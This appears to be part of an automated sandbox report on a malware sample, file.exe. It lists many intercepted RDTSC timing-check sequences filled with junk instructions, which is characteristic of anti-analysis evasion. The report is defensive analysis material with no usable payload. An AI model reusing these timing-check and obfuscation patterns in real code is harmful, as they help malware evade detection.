Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F78 second address: 993F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2117B second address: A21197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F1A796B9BF2h 0x0000000b jmp 00007F1A796B9BEAh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A21197 second address: A211AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F1A796F3546h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20C9E second address: A20CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1A796B9BF4h 0x00000008 jmp 00007F1A796B9BF2h 0x0000000d jl 00007F1A796B9BE6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 je 00007F1A796B9BEEh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20CD9 second address: A20D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F1A796F3550h 0x00000010 jmp 00007F1A796F3556h 0x00000015 popad 0x00000016 jc 00007F1A796F3552h 0x0000001c jne 00007F1A796F3546h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20E76 second address: A20E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF95 second address: 98EF9E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24698 second address: A246C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1A796B9BF7h 0x0000000a popad 0x0000000b pushad 0x0000000c jne 00007F1A796B9BEEh 0x00000012 pushad 0x00000013 popad 0x00000014 jng 00007F1A796B9BE6h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A8AC second address: A2A8C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A8C9 second address: A2A8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BEFh 0x00000009 jng 00007F1A796B9BE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A8E2 second address: A2A8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F8D second address: A28F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F91 second address: A28F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F95 second address: A28FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1A796B9BEAh 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F1A796B9BE6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28FB5 second address: A28FC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F1A796F3546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28FC8 second address: A28FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1A796B9BF9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28FEB second address: A28FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F1A796F3546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A291A3 second address: A291A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A291A7 second address: A291CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1A796F3546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1A796F3556h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2933E second address: A29390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F1A796B9BE6h 0x00000009 jmp 00007F1A796B9BF3h 0x0000000e jng 00007F1A796B9BE6h 0x00000014 jp 00007F1A796B9BE6h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F1A796B9BF5h 0x00000023 jmp 00007F1A796B9BEFh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A294CD second address: A294D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29639 second address: A29658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1A796B9BE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1A796B9BF0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29658 second address: A2965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29920 second address: A29924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29ABC second address: A29AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29AC0 second address: A29AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1A796B9BF7h 0x0000000c jmp 00007F1A796B9BF1h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1A796B9BF5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29AF5 second address: A29B18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1A796F3555h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F1A796F3546h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E69C second address: A2E6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E6A6 second address: A2E6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F3558h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1A796F354Ah 0x00000011 jc 00007F1A796F3546h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DBB1 second address: A2DBC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007F1A796B9BE6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DD3F second address: A2DD5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DEB6 second address: A2DEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DEBA second address: A2DEC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DEC5 second address: A2DECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DECD second address: A2DED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DED5 second address: A2DEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DEDB second address: A2DEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1A796F3546h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3469D second address: A346B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A346B8 second address: A346BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A346BD second address: A346C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A346C6 second address: A346CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34966 second address: A3497E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F1A796B9BF3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C43 second address: A34C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C47 second address: A34C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C4B second address: A34C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C55 second address: A34C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34C5B second address: A34C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3557D second address: A35594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35594 second address: A35598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35598 second address: A355C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F1A796B9BECh 0x0000000c jg 00007F1A796B9BE6h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1A796B9BF7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A355C4 second address: A355C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A355C9 second address: A355E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BF5h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35F18 second address: A35F36 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1A796F3546h 0x00000008 jnp 00007F1A796F3546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F1A796F3546h 0x00000018 jnp 00007F1A796F3546h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36210 second address: A36232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BEAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1A796B9BEEh 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A526 second address: A3A542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1A796F354Bh 0x0000000b popad 0x0000000c jnc 00007F1A796F3566h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A542 second address: A3A546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7FA second address: A3A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F1A796F3555h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A819 second address: A3A821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A821 second address: A3A850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1A796F3546h 0x0000000a jc 00007F1A796F3546h 0x00000010 jmp 00007F1A796F3558h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A9D7 second address: A3A9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AE26 second address: A3AE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F3559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AFBB second address: A3AFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AFBF second address: A3AFC9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1A796F3546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AFC9 second address: A3AFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A460ED second address: A460F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A460F1 second address: A46102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1A796B9BEBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46102 second address: A46107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46987 second address: A46992 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46992 second address: A469B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1A796F3559h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46C1C second address: A46C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46C2A second address: A46C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46EC2 second address: A46EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47595 second address: A47599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47599 second address: A475AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jbe 00007F1A796B9BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A475AA second address: A475B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45C77 second address: A45C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45C7D second address: A45CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F1A796F3546h 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F1A796F3546h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jnl 00007F1A796F3552h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45CAA second address: A45CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E648 second address: A4E65C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1A796F3546h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F1A796F3552h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6032C second address: A60345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F1A796B9BEDh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6278E second address: A627A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F3550h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A674A2 second address: A674A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A705FB second address: A7062D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F1A796F354Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F1A796F3558h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7062D second address: A70647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796B9BEDh 0x00000009 popad 0x0000000a jbe 00007F1A796B9BECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70647 second address: A7064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7064B second address: A70657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F1A796B9BE6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70657 second address: A7065D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7507C second address: A75097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1A796B9BEEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75097 second address: A7509B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AFC5 second address: A7AFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AFCB second address: A7AFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AFCF second address: A7AFD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AFD3 second address: A7B012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1A796F3555h 0x0000000e jnc 00007F1A796F3546h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edx 0x0000001a je 00007F1A796F354Ch 0x00000020 push edi 0x00000021 jo 00007F1A796F3546h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B502 second address: A7B527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF1h 0x00000007 pushad 0x00000008 jmp 00007F1A796B9BEDh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B527 second address: A7B545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F1A796F357Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1A796F354Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B545 second address: A7B549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B549 second address: A7B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
